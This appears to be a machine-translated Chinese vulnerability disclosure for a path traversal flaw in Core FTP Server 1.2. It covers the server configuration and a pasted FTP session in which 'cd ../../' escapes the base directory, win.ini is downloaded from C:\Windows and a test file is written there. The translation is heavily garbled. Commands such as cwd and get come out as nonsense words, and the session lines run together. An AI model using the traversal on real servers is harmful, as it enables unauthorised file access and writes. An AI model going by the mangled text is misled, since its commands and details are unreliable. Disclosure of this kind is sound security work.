(R1)核心FTP服务器路径遍历任意文件/目录的访问

配置

核心FTP服务器1.2构建588(32位或64位)公布的4月7日,2016年是安装。这一发现是基于通过GUI设置“域属性”,以便“基本目录”C:\Users\Public和认证方法”使WinNT用户”检查。“使WinNT“身份验证方法允许远程用户登录的现有的Windows用户。没有其他主要设置改变。安装在服务器上,核心FTP服务器,有一个本机Windows管理用户巧妙地命名为“管理“我们补充道。

的文档吗?

核心FTP服务器的文档相当少,足以让它配置和工作。然而,“使WinNT用户”小复选框功能(可以看到在第二图像http://www.coreftp.com/server/help/Create_Domain.htm)没有附带任何警告或解释,这意味着什么,除了使用本机Windows帐户进行身份验证的内容。从历史上看,FTP服务器设置一个“基本目录”就像web服务器设置”docroot”,这个位置的目的是最高的目录树可以访问。历史遍历攻击会绕过限制允许访问系统上的文件和/或目录。根据相关文档:

http://www.coreftp.com/server/help/help_/GettingStarted.htm5:选择一个基本目录,所有目录和用户目录将存在。如果你选择一个网络驱动器,您可能需要修改帐户在核心FTP服务器的服务属性,随着系统的帐户可能没有访问网络驱动器。http://www.coreftp.com/server/help/Add_account.htm提醒一下,如果你锁定用户的主目录,他们将不能访问虚拟路径。

然而,锁定一个用户的主目录不与NT认证工作。基于上述,管理员安装核心FTP可以预料,它应该限制用户配置的基本目录和子目录。

相对路径遍历

登录时“admin”到目标机使WinNT用户配置、核心FTP服务器应该限制任何用户C:\Users\Public及其子目录。然而,使用一个简单的遍历(例如. . / . . /)通过“cd'命令,攻击者可以遍历目录”C: \”,下载文件(如。win.ini从C: \ Windows),并创建文件(如。”albino_lobster.txt”C:\Windows):

马达加斯加:~马岛猬ftp美元(电子邮件保护)连接到192.168.1.3。220 -核心FTP服务器1.2版,588年建立,64位,安装0天前未注册220 -你好朋友220 331密码需要管理员密码:230 - 230年登录远程系统类型是UNIX。使用二进制模式来传输文件。ftp > ls 227进入被动模式(192168,3237224)。150开ASCII模式数据连接dr-xr-xr-x 1所有者组0 2009年7月14日水豚dr-xr-xr-x 1所有者组0 2009年7月14日下载dr-xr-xr-x 1所有者组0 2009年7月14日音乐dr-xr-xr-x 1所有者组0 2009年7月14日的照片dr-xr-xr-x 1所有者组0 2010年11月21日录制电视dr-xr-xr-x 1所有者组0 226年7月14日2009年盗版软件传输完整的ftp > cd . . / . .慢性消耗病/ 250命令成功ftp > pwd远程目录:/ ftp > ls 227进入被动模式(192168,3237227)。150开ASCII模式数据连接dr-xr-xrwx 1所有者组0 4月4日12:39 cygwin65 dr-xr-xr-x 1所有者组0 4月18日10:30程序文件dr-xr-xr-x 1所有者组0 4月18日13:54程序文件(x86) dr-xr-xrwx 1所有者组0 4月18日10:29 Python9000 dr-xr-xr-x 1 0 4月18日14:59用户组所有者dr-xr-xrwx 1所有者组0 4月18日16:58 Windows 226传输完整的ftp > cd Windows 250命令成功ftp >慢性消耗性疾病得到胜利。ini当地:赢了。ini远程:赢了。ini 227进入被动模式(192168,3237248)。150 RETR命令403 2.88 MiB / s 226年开始转移完成403字节收到00:00 (1.32 MiB / s) ftp > albino_lobster。txt当地:albino_lobster。三种远程:albino_lobster。txt 227 Entering Passive Mode (192,168,1,3,238,4). 150 STOR command started 100% |********************************************************************************************************| 4 2.00 KiB/s 00:00 ETA 226 Transfer Complete 4 bytes sent in 00:00 (1.52 KiB/s)

请注意,如果你作为一个非管理员登录,你不能写C: \ Windows。